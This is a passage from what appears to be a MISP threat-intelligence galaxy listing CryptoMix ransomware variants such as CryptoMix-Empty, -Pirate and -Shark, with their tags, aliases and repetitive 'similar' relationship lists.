  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Empty

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Empty"

CryptoMix-Empty has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Error

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Error"

CryptoMix-Error has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Exte

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Exte"

CryptoMix-Exte has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-FILE

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-FILE"

Cryptomix-FILE has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-MOLE66

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-MOLE66"

CryptoMix-MOLE66 has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Noob

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Noob"

CryptoMix-Noob has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Ogonia

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Ogonia"

CryptoMix-Ogonia has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Pirate

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Pirate"

CryptoMix-Pirate has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Revenge

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Revenge"

CryptoMix-Revenge has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-SERVER

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-SERVER"

Cryptomix-SERVER is also known as:

  • SERVER Cryptomix

Cryptomix-SERVER has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Shark

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Shark"

CryptoMix-Shark is also known as:

  • Shark CryptoMix

CryptoMix-Shark has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

